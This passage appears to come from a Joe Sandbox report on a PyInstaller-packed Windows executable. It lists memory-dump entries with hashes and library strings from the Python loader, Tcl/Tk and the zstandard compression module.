• Associated: 00000002.00000002.3285413947.00007FF8A7E95000.00000004.00000001.01000000.00000039.sdmp
• Associated: 00000002.00000002.3285430029.00007FF8A7E96000.00000002.00000001.01000000.00000039.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e90000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _wassert
                                                                                                                                                                                                            • String ID: OCB_ENCRYPT==direction || OCB_DECRYPT==direction$src/raw_ocb.c
                                                                                                                                                                                                            • API String ID: 3234217646-1106498308
                                                                                                                                                                                                            • Opcode ID: bbf22bfe169d78c2ac09731688de6daaf5fe930a6b0cbf5783ca536d68021edf
                                                                                                                                                                                                            • Instruction ID: 1682201c21ebf61d3f1f795ec3bb62eee3007d83f4582919197ce4966047fd93
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbf22bfe169d78c2ac09731688de6daaf5fe930a6b0cbf5783ca536d68021edf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19E14A5310E6D059C7168FB590202BE7FF0DB1BA59F4D80B6EBE84E58BD50CC254EB2A
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
• Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            • Opcode ID: 989cb14306d5d96352166a30740da91af251197d5d77a06408e0a69cb93c0577
                                                                                                                                                                                                            • Instruction ID: 1cb7487b948f0a7cd97250a80f73b8a2e04ed0733190f43589168fcbeae6241c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 989cb14306d5d96352166a30740da91af251197d5d77a06408e0a69cb93c0577
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF51B332609AD19AE7628B22D810BF977A1F7457C9F444026EE8D56B89DF3CC206CB14
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc
• String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                                                            • API String ID: 190572456-3109299426
                                                                                                                                                                                                            • Opcode ID: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
                                                                                                                                                                                                            • Instruction ID: 18214d0df65889b5a8c88de98d60f10d03da459692f6e550886dbe3ef67501c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC42E778A0FB43B5EA55AF19A890174B7A5AF04786BDA5135C80E3A2B4FF7CF514C320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PyUnicode_FromString.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7704
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7717
                                                                                                                                                                                                            • PyErr_NewException.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7729
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7743
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7756
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF776C
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF777F
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7795
                                                                                                                                                                                                            • PyTuple_New.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77A0
                                                                                                                                                                                                            • PyLong_FromLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77AE
                                                                                                                                                                                                            • PyTuple_SetItem.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77BC
                                                                                                                                                                                                            • PyLong_FromLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77C7
                                                                                                                                                                                                            • PyTuple_SetItem.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77D8
                                                                                                                                                                                                            • PyLong_FromLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77E3
                                                                                                                                                                                                            • PyTuple_SetItem.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF77F4
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7807
                                                                                                                                                                                                            • PyBytes_FromStringAndSize.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7819
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7831
                                                                                                                                                                                                            • PyErr_Format.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF784A
                                                                                                                                                                                                            • PyLong_FromUnsignedLongLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7857
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF786A
                                                                                                                                                                                                            • PyLong_FromUnsignedLongLong.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7877
                                                                                                                                                                                                            • PyModule_AddObject.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF788A
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78A0
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78B6
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78CC
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78E2
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF78F8
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF790E
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7924
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF793A
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7950
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7966
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF797C
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7992
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF79A8
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF79BE
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF79D4
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF79EA
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A00
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A16
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A2C
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A42
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A55
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A6B
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A81
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7A97
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7AAD
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7AC3
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7AD9
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7AEF
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B05
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B1B
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B31
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B47
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B5D
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B73
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B86
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7B9C
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7BB2
                                                                                                                                                                                                            • PyModule_AddIntConstant.PYTHON38(?,?,-00000001,00007FF8A7FF246B,?,?,?,00007FF8A7FF2038), ref: 00007FF8A7FF7BC5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Module_$Constant$FromLong$Object$Long_$Tuple_$Item$Err_StringUnsigned$Bytes_ExceptionFormatSizeUnicode_
                                                                                                                                                                                                            • String ID: 0.17.0$BLOCKSIZELOG_MAX$BLOCKSIZE_MAX$CHAINLOG_MAX$CHAINLOG_MIN$COMPRESSION_RECOMMENDED_INPUT_SIZE$COMPRESSION_RECOMMENDED_OUTPUT_SIZE$COMPRESSOBJ_FLUSH_BLOCK$COMPRESSOBJ_FLUSH_FINISH$CONTENTSIZE_ERROR$CONTENTSIZE_UNKNOWN$DECOMPRESSION_RECOMMENDED_INPUT_SIZE$DECOMPRESSION_RECOMMENDED_OUTPUT_SIZE$DICT_TYPE_AUTO$DICT_TYPE_FULLDICT$DICT_TYPE_RAWCONTENT$FLUSH_BLOCK$FLUSH_FRAME$FORMAT_ZSTD1$FORMAT_ZSTD1_MAGICLESS$FRAME_HEADER$HASHLOG_MAX$HASHLOG_MIN$LDM_BUCKETSIZELOG_MAX$LDM_MINMATCH_MAX$LDM_MINMATCH_MIN$MAGIC_NUMBER$MAX_COMPRESSION_LEVEL$MINMATCH_MAX$MINMATCH_MIN$SEARCHLENGTH_MAX$SEARCHLENGTH_MIN$SEARCHLOG_MAX$SEARCHLOG_MIN$STRATEGY_BTLAZY2$STRATEGY_BTOPT$STRATEGY_BTULTRA$STRATEGY_BTULTRA2$STRATEGY_DFAST$STRATEGY_FAST$STRATEGY_GREEDY$STRATEGY_LAZY$STRATEGY_LAZY2$TARGETLENGTH_MAX$TARGETLENGTH_MIN$WINDOWLOG_MAX$WINDOWLOG_MIN$ZSTD_VERSION$ZstdError$__version__$could not create frame header object$zstd.ZstdError
                                                                                                                                                                                                            • API String ID: 1631004291-83254250
                                                                                                                                                                                                            • Opcode ID: a730aba727810c897bb5ec01f7f3dc1d7193724165707fcb41d1ae6353e0e4c8
                                                                                                                                                                                                            • Instruction ID: 35707b569b300d89108d9531d834f7b80e4fdb6da0fb68b16a81aed0860849e7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a730aba727810c897bb5ec01f7f3dc1d7193724165707fcb41d1ae6353e0e4c8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1C12F65B1AF06A2EE049B15E9543783362EF59FD0F425035CC0E07BE09F7DA1A9C36A
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                            • API String ID: 2238633743-1453502826
                                                                                                                                                                                                            • Opcode ID: a292763a8d5a77b935cdc9b9955935c5d127cb344716fe205c8c3bab3fa22d19
                                                                                                                                                                                                            • Instruction ID: 5d20e367a171e35ee49b282444539146df545677df75b314cf85fa20483d0628
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a292763a8d5a77b935cdc9b9955935c5d127cb344716fe205c8c3bab3fa22d19
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98E1E274A0FB83B8FE55EF15A981174A3A5AF04782BDA6031D80E362B4EF7CE4548370
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FromSet_StringUnicode_
                                                                                                                                                                                                            • String ID: BufferSegment$BufferSegments$BufferWithSegments$BufferWithSegmentsCollection$FrameParameters$ZstdCompressionDict$ZstdCompressionParameters$ZstdCompressionReader$ZstdCompressionWriter$ZstdCompressor$ZstdDecompressionReader$ZstdDecompressionWriter$ZstdDecompressor$backend_features$buffer_types$could not create empty set$could not create feature string$could not create feature string$could not create feature string$multi_compress_to_buffer$multi_decompress_to_buffer
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dict_$ItemString$Dealloc$LongLong_$Unsigned$From$Tuple_$Arg_Object_ParseSizeSsize_t
                                                                                                                                                                                                            • String ID: chain_log$chain_log$dict_size$dict_size$hash_log$hash_log$i:from_level$min_match$min_match$search_log$search_log$source_size$source_size$strategy$strategy$target_length$target_length$window_log$window_log
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fprintf$fflush$free$__stdio_common_vfprintfcalloc
                                                                                                                                                                                                            • String ID: Computing frequencies$Failed to allocate frequency table $Failed to allocate scratch buffers $Testing on %u samples of total size %u$Total number of testing samples is %u and is invalid.$Total number of training samples is %u and is invalid$Total samples size is too large (%u MB), maximum size is %u MB$Training on %u samples of total size %u
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeallocEval_Object_SizeThread$Err_$CallMethod_String$FormatRestoreSave$AttrFromLong_Mem_Ssize_t$Arg_Bytes_FreeKeywords_MallocMemoryPackParseTupleTuple_
                                                                                                                                                                                                            • String ID: OO|Kkk:copy_stream$error ending compression stream: %s$error setting source size: %s$first argument must have a read() method$read$read$second argument must have a write() method$write$write$write$zstd compress error: %s
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_FreeMem_ReleaseSubtypeType_$Arg_Err_FormatInfoKeywords_ParseSizeSystemTuple
                                                                                                                                                                                                            • String ID: O|y*i:multi_decompress_to_buffer$argument must be list or BufferWithSegments$decompressed_sizes size mismatch; expected %zd, got %zd$decompressed_sizes size mismatch; expected %zd, got %zd$decompressed_sizes size mismatch; expected %zd; got %zd$item %zd has offset outside memory area$item %zd has offset outside memory area$item %zd not a bytes like object
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeallocObject_Size$String$CallErr_Method_$AttrEval_FromLong_Mem_Ssize_tThread$Arg_Bytes_FormatFreeKeywords_MallocMemoryPackParseRestoreSaveTupleTuple_memmove
                                                                                                                                                                                                            • String ID: OO|kk:copy_stream$first argument must have a read() method$read$read$second argument must have a write() method$write$write$zstd decompressor error: %s
                                                                                                                                                                                                            • API String ID: 232765988-3974705440
                                                                                                                                                                                                            • Opcode ID: 942da154b746fd8199c0830da1f4d3ef868b4fa211f6350233e4324c2f322fcd
